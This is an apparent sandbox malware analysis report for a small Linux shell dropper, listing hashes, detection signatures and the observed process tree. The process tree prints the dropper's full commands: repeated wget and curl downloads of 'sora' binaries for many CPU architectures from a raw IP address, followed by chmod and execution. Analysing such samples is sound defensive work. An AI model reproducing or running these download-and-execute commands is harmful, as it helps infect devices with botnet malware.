848e8eadd6296084ce9231181c15d333d453ff0a95f4163477265211839d4f54 | Triage

Analysis

max time kernel
16s
max time network
16s
platform
debian-9_mipsel
resource
debian9-mipsel-20240226-en
resource tags

arch:mipselimage:debian9-mipsel-20240226-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipselsystem
submitted
28-03-2024 10:06

Sharing

Report Analysis Logs

General

Target

02ca1bec2de42845c35867af0dc72be3_JaffaCakes118
Size

1KB
MD5

02ca1bec2de42845c35867af0dc72be3
SHA1

d2fc439476dd4ec34fce01257762a34b0aa6f3d5
SHA256

848e8eadd6296084ce9231181c15d333d453ff0a95f4163477265211839d4f54
SHA512

302e57020da9a74ee02c1f39c81aacb5a4385cedb7a0323ee3ba208d8e58fe5abdf83e2975bc8416ba684e164a512420b550f15569f3243f39a00d4cd99a3dc7

Score

7^/10

Malware Config

Signatures

Executes dropped EXE 10 IoCs

Processes:

robbenrobbenrobbenrobbenrobbenrobbenrobbenrobbenrobbenrobben

ioc	pid	process
/tmp/robben	736	robben
/tmp/robben	748	robben
/tmp/robben	754	robben
/tmp/robben	760	robben
/tmp/robben	766	robben
/tmp/robben	779	robben
/tmp/robben	797	robben
/tmp/robben	816	robben
/tmp/robben	835	robben
/tmp/robben	841	robben

Reads runtime system information 10 IoCs

Reads data from /proc virtual filesystem.

Processes:

curlcurlcurlcurlcurlcurlcurlcurlcurlcurl

description	ioc	process
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl

Writes file to tmp directory 1 IoCs
Malware often drops required files in the /tmp directory.

Processes:

description ioc

File opened for modification /tmp/robben

/tmp/02ca1bec2de42845c35867af0dc72be3_JaffaCakes118
/tmp/02ca1bec2de42845c35867af0dc72be3_JaffaCakes118
1⤵
PID:711

/usr/bin/wget
wget http://188.127.235.211/bins/sora.x86
2⤵
PID:713

/usr/bin/curl
curl -O http://188.127.235.211/bins/sora.x86
2⤵
- Reads runtime system information
PID:721

/bin/cat
cat sora.x86
2⤵
PID:733

/bin/chmod
chmod +x 02ca1bec2de42845c35867af0dc72be3_JaffaCakes118 robben systemd-private-3e17f7b24c154a0b9f1560cf80852a3b-systemd-timedated.service-mvqXlv
2⤵
PID:734

/tmp/robben
./robben Payload
2⤵
- Executes dropped EXE
PID:736

/usr/bin/wget
wget http://188.127.235.211/bins/sora.mips
2⤵
PID:738

/usr/bin/curl
curl -O http://188.127.235.211/bins/sora.mips
2⤵
- Reads runtime system information
PID:743

/bin/cat
cat sora.mips
2⤵
PID:746

/bin/chmod
chmod +x 02ca1bec2de42845c35867af0dc72be3_JaffaCakes118 robben systemd-private-3e17f7b24c154a0b9f1560cf80852a3b-systemd-timedated.service-mvqXlv
2⤵
PID:747

/tmp/robben
./robben Payload
2⤵
- Executes dropped EXE
PID:748

/usr/bin/wget
wget http://188.127.235.211/bins/sora.mpsl
2⤵
PID:750

/usr/bin/curl
curl -O http://188.127.235.211/bins/sora.mpsl
2⤵
- Reads runtime system information
PID:751

/bin/cat
cat sora.mpsl
2⤵
PID:752

/bin/chmod
chmod +x 02ca1bec2de42845c35867af0dc72be3_JaffaCakes118 robben systemd-private-3e17f7b24c154a0b9f1560cf80852a3b-systemd-timedated.service-mvqXlv
2⤵
PID:753

/tmp/robben
./robben Payload
2⤵
- Executes dropped EXE
PID:754

/usr/bin/wget
wget http://188.127.235.211/bins/sora.arm4
2⤵
PID:756

/usr/bin/curl
curl -O http://188.127.235.211/bins/sora.arm4
2⤵
- Reads runtime system information
PID:757

/bin/cat
cat sora.arm4
2⤵
PID:758

/bin/chmod
chmod +x 02ca1bec2de42845c35867af0dc72be3_JaffaCakes118 robben systemd-private-3e17f7b24c154a0b9f1560cf80852a3b-systemd-timedated.service-mvqXlv
2⤵
PID:759

/tmp/robben
./robben Payload
2⤵
- Executes dropped EXE
PID:760

/usr/bin/wget
wget http://188.127.235.211/bins/sora.arm5
2⤵
PID:762

/usr/bin/curl
curl -O http://188.127.235.211/bins/sora.arm5
2⤵
- Reads runtime system information
PID:763

/bin/cat
cat sora.arm5
2⤵
PID:764

/bin/chmod
chmod +x 02ca1bec2de42845c35867af0dc72be3_JaffaCakes118 robben systemd-private-3e17f7b24c154a0b9f1560cf80852a3b-systemd-timedated.service-mvqXlv
2⤵
PID:765

/tmp/robben
./robben Payload
2⤵
- Executes dropped EXE
PID:766

/usr/bin/wget
wget http://188.127.235.211/bins/sora.arm6
2⤵
PID:768

/usr/bin/curl
curl -O http://188.127.235.211/bins/sora.arm6
2⤵
- Reads runtime system information
PID:769

/bin/cat
cat sora.arm6
2⤵
PID:776

/bin/chmod
chmod +x 02ca1bec2de42845c35867af0dc72be3_JaffaCakes118 robben systemd-private-3e17f7b24c154a0b9f1560cf80852a3b-systemd-timedated.service-mvqXlv
2⤵
PID:777

/tmp/robben
./robben Payload
2⤵
- Executes dropped EXE
PID:779

/usr/bin/wget
wget http://188.127.235.211/bins/sora.arm7
2⤵
PID:781

/usr/bin/curl
curl -O http://188.127.235.211/bins/sora.arm7
2⤵
- Reads runtime system information
PID:786

/bin/cat
cat sora.arm7
2⤵
PID:794

/bin/chmod
chmod +x 02ca1bec2de42845c35867af0dc72be3_JaffaCakes118 robben systemd-private-3e17f7b24c154a0b9f1560cf80852a3b-systemd-timedated.service-mvqXlv
2⤵
PID:795

/tmp/robben
./robben Payload
2⤵
- Executes dropped EXE
PID:797

/usr/bin/wget
wget http://188.127.235.211/bins/sora.ppc
2⤵
PID:800

/usr/bin/curl
curl -O http://188.127.235.211/bins/sora.ppc
2⤵
- Reads runtime system information
PID:804

/bin/cat
cat sora.ppc
2⤵
PID:813

/bin/chmod
chmod +x 02ca1bec2de42845c35867af0dc72be3_JaffaCakes118 robben systemd-private-3e17f7b24c154a0b9f1560cf80852a3b-systemd-timedated.service-mvqXlv
2⤵
PID:815

/tmp/robben
./robben Payload
2⤵
- Executes dropped EXE
PID:816

/usr/bin/wget
wget http://188.127.235.211/bins/sora.m68k
2⤵
PID:819

/usr/bin/curl
curl -O http://188.127.235.211/bins/sora.m68k
2⤵
- Reads runtime system information
PID:825

/bin/cat
cat sora.m68k
2⤵
PID:832

/bin/chmod
chmod +x 02ca1bec2de42845c35867af0dc72be3_JaffaCakes118 robben systemd-private-3e17f7b24c154a0b9f1560cf80852a3b-systemd-timedated.service-mvqXlv
2⤵
PID:834

/tmp/robben
./robben Payload
2⤵
- Executes dropped EXE
PID:835

/usr/bin/wget
wget http://188.127.235.211/bins/sora.sh4
2⤵
PID:837

/usr/bin/curl
curl -O http://188.127.235.211/bins/sora.sh4
2⤵
- Reads runtime system information
PID:838

/bin/cat
cat sora.sh4
2⤵
PID:839

/bin/chmod
chmod +x 02ca1bec2de42845c35867af0dc72be3_JaffaCakes118 robben systemd-private-3e17f7b24c154a0b9f1560cf80852a3b-systemd-timedated.service-mvqXlv
2⤵
PID:840

/tmp/robben
./robben Payload
2⤵
- Executes dropped EXE
PID:841

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...